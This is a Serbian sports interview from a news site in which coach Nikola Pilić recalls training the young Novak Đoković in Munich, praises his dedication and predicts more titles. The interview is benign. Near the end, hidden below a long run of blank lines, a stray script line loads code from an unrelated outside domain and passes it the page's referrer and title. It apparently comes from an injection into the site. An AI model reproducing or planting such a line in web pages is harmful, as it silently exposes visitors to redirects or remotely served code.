Sport
01.05.2016. 16:24
ekspres

PILIĆ ZA EKSPRES: Nisam izdržao, morao sam to da kažem o Novaku

Ekspres.net
Izvor: Ekspres.net

Nikad ne prognoziram domete svojih učenika, ali pre deceniju i po, gledajući kako Nole radi na jednom treningu, rekao sam ovaj mali će biti među prvih pet na svetu

Oktobar 1999. Oberšlajshajm na obodu Minhena. Severac njiše jutarnju zavesu od mraka i izmaglice.  Jedan čovek i dečak u laganim jaknama, kao siluete, preskaču ogradu teniskog centra i odlaze u tamu svlačionice.

U osam i petanest upalilo se svetlo. Na vratima je stajao Nikola Pilić a tamo sa položenim laktovima na stolu kao jastukom, bio je Novak Đoković. Susret koji je promeni0 teniski svet.

- Možda je to bila I neka simbolika onog što će se kasnije dešavati. Za njega nije bilo prepreke. Bio sam jako iznenađen kad sam video Novaka koji je sa stricem Goranom tako rano stigao u akademiju. Tek kasnije mi je bilo jasno kako su uspeli da uđu. Nekoliko dana ranije zvala me je iz Beograda Jelena Genčić. Rekla je da od Monike Seleš nije videla veći talenat. Ona je s njim došla do određenog nivoa i rekla je da bi svakako trebalo da ga vidim. Rekao sam pošalji ga, Interesovalo me o čemu se radi.  Jelena se nije zaletala u ocenama kad bi nekog opisivala. Imala je tu dozu racionalnosti snimka bez obzira koliko simpatija gajila prema tim klincima. I Novak je tako došao kod mene- kaže na početku razgovora za „Ekspres.net“, Nikola Pilić, igrački polufinalist Vimbldona i finalista Rolan Farosa a trenerski jedini stručnjak koji je sa tri različlite selekcije (Nemačka, Hrvatska, Srbija) osvajao Dejvis kup i čovek koji je 41 igrača doveo u Top 100.

Krut zglob, ali oko i fokus šampionski

Nakon što je Pilićeva supruga Mia našla jaknu kako bi se dečak iz Berograda ugrejao, pa malo odmorio od puta, prvi trening zakazan je za dva sata popodne. Dvadeset minuta pre njegovog početka Novak kreće na teren, kaže da se „zagreje“ s dopunom da je to za njega „jako važno“.

- Prosto je neverovatno s kakvom odlučnošću je on to rekao. Moram da priznam da je Novak od prvog susreta počeo da me osvaja svojom posvećenošču tenisu. Tako mali a profesionalac. Meni je, a evo već sam 36 godine u trenerskim vodama, jako važno da igrač o tenisu isto razmišlja ujutru, posle podne i uveče, Ako nije tako, onda je reč o zabavi ili hobiju i od ozbiljnog posla neće niti ništa

Ekspres.net
Izvor: Ekspres.netEkspres.net
Foto: TANJUG/ Tanja Valic

Kakvi su bili prvi snimci? Koliko su preporuke iz Beograda bile verodostojne?

- Odmah sam video da Novak ima oko, fokus, kretnju i koordinaciju. Iznad svega, imao je ogromnu želju da uči i radi. Time je osvajao ne samo mene nego i ostale u Akademiji.

A koje su bile manjkavosti?

- Nije imao zglob. Tu je bio krut. Bilo je grifova. Odmah sam video da će morati dosta da se radi na servisu i voleju.

I kako je krenuo rad? Poznata je priča da je Goran Ivanišević, koji je osvojio Vimbldon 2001. kod vas morao da uradio deset sklekova kad bi zakasnio na trening.

- Novaku to nije moiglo da se desi. Dolazak pola sata pre treninga, uvek besprekorna torba i zagrevanje. Znala je da ga uhvati nostalgija, što je razumljivo za njegove godine pa smo Mia i ja pričali s njim o svemu. Ali on bi se u tim razgovorima uvek vraćao na tenis. Kao mantru je ponavljao ja neću samo da igram tenis, hoću da budem najbolji. Kasnije je to hoću da budem najbolji pretvorio hoću da osvojim Vimbldon. Iako dečak, on je znao kojim putem može da dođe do vrha Ja sam imao osećaj da je on odbrojavao minute do treninga. Kad je takav pristup, onda nema kašnjenja. Njegov sat je kucao teniski.

Kad je reč o teniskoj abecedi,  kako se odvijalo Novakovo napredovanje na akademiji?

- Iz dana u dana... Ima izražen koučabiliti. Ili što biste vi u Srbiji rekli upijao je svaki savet kao sunđer. Bio je savršeno predan učenju a Bog mu je dao osećaj. I to je ta dobitna kombinacija. Nekako u isto vreme kod mene u akademiji bili su Novak i Ernests Gulbis. Letonac je jako zanmljiv. Njemu je znalo na treningu da se javi deset ne običnih nego lepršavih ideja. I dok je on u igru ubacivao elemente zabave, Novak je učio, ponavljao, učio i slagao pojedine elemente igre jedan na drugi i to su bile stepenice koje su ga dovele do vrha.

Vi ste to predvideli još 15 godina. Goran Ivanišević Vas je otkucao?

- Novak me je naterao da odstupim od svog principa. Jako sam obazriv u procenama koliko će neki mladi igrač dogurati. A kako i ne bih kad od 20 juniorskih pobednika Vimbldona nih deset je jednostavno nestalo sa scene. „Zapamti, Gorane, onog malog s crnom kosom, biće među pet najboljih na svetskoj listi“- rečenica je za koju Ivanišević tvrdi da je još pre deceniju i po čuo od mene na treningu u Akademiji. Nije bilo razloga da mu ne poverujem.  Ali ona govori koliko je jak utisak u tom trenutku ostavio Novak. To sam za njega rekao i za nikog više. Jer, toliko komponenti treba da se složi da bi dečak od 14 godina stigao do kruga najboljih na svetu.Priznajem, tada sam već bio Noletov fan. Kupio me mali svojim poimanjem tenisa

Novak je svetlo Srbije

Ekspres.net
Izvor: Ekspres.netEkspres.net
Foto: AP Photo/Kathy Willens

Zašto je Novak najbolji. U kolekciji je 11 grend slem titula i rekordan rejting. Dominacija se nastavlja?

- Zato što je šampion i zato što je kompletan čovek. On je i pobednik, on je i džentlemen. Fenemenalan spoj talenta, snage, umeća i mentalne čvrstine. O njemu ne treba govoriti samo kao teniseru. Novak je svetlo Srbije. Osvojio je toliko toga, ima trofeje, novce, popularnost a čvrsto hoda po zemlji.

Kad smo kod zemlje, da li će pod njim pasti i ta šljaka Rolan Garos?

- . Biće će što biti mora! Ne želim ni za milimetar da oduzmem zasluženost Vavrinkine pobede u prošlom finalu.Mora se, međutim, vratiti film pa videti kakav je meč Novak odigrao u polufinalu s Marejem. Maraton od dva dana. Kao da neko „odozgo“ ne dozvoljava da  padne i taj poslednji neosvojeni grend slem. Ali, znam Novaka još od onog jutra u Minhenu i znam da on neće odustati dok ne podigne pehar na Rolan Garosu.

Koliko Novak još može da bude na vrhu?

- Dugo. Pa, tek mu je 28. Profesionalac je, porodičan čovek, pametan je, s jednakim žarom igra i govori o tenisu kao kad je počinjao. Dakle, minimum još pet godina može da u samom vrhu. I ja mu to od srca želim- kaže Nikola Pilić za koga je Novak rekao da je nazaslužniji za njegov nemački mentalitet koji vodi do vrha. I koji je počeo da se ugrađuje u njegovu šampionsku matricu jednog hladnog jutra u Minhenu

SA ROLAN GAROSA ZARADA  350 DOLARA

Pilić ističe da samo mentalno jaki i stopostotno tenisu predani igrači, kakav je Novak Đoković, mogu da ostanu na sportskom koloseku i pored jake medijske pažnje i posebno fantastičnih zarada.

- Kad sam 1973.  igrao u finalu Rolan Garosa protiv Nastasea dobio sam 7.000 dolara. Od toga 28 posto je otišlo na francuski porez, Mia i ja smo bili u Parizu... dok sam platio sve troškove - ostalo mi je 350 dolara. Sada pobednik u Parizu dobija dva miliona dolara, a finalist milion- kaže Pilić.

 

 

 

 

 

 

 

 

 s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
scattered clouds
10°C
18.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve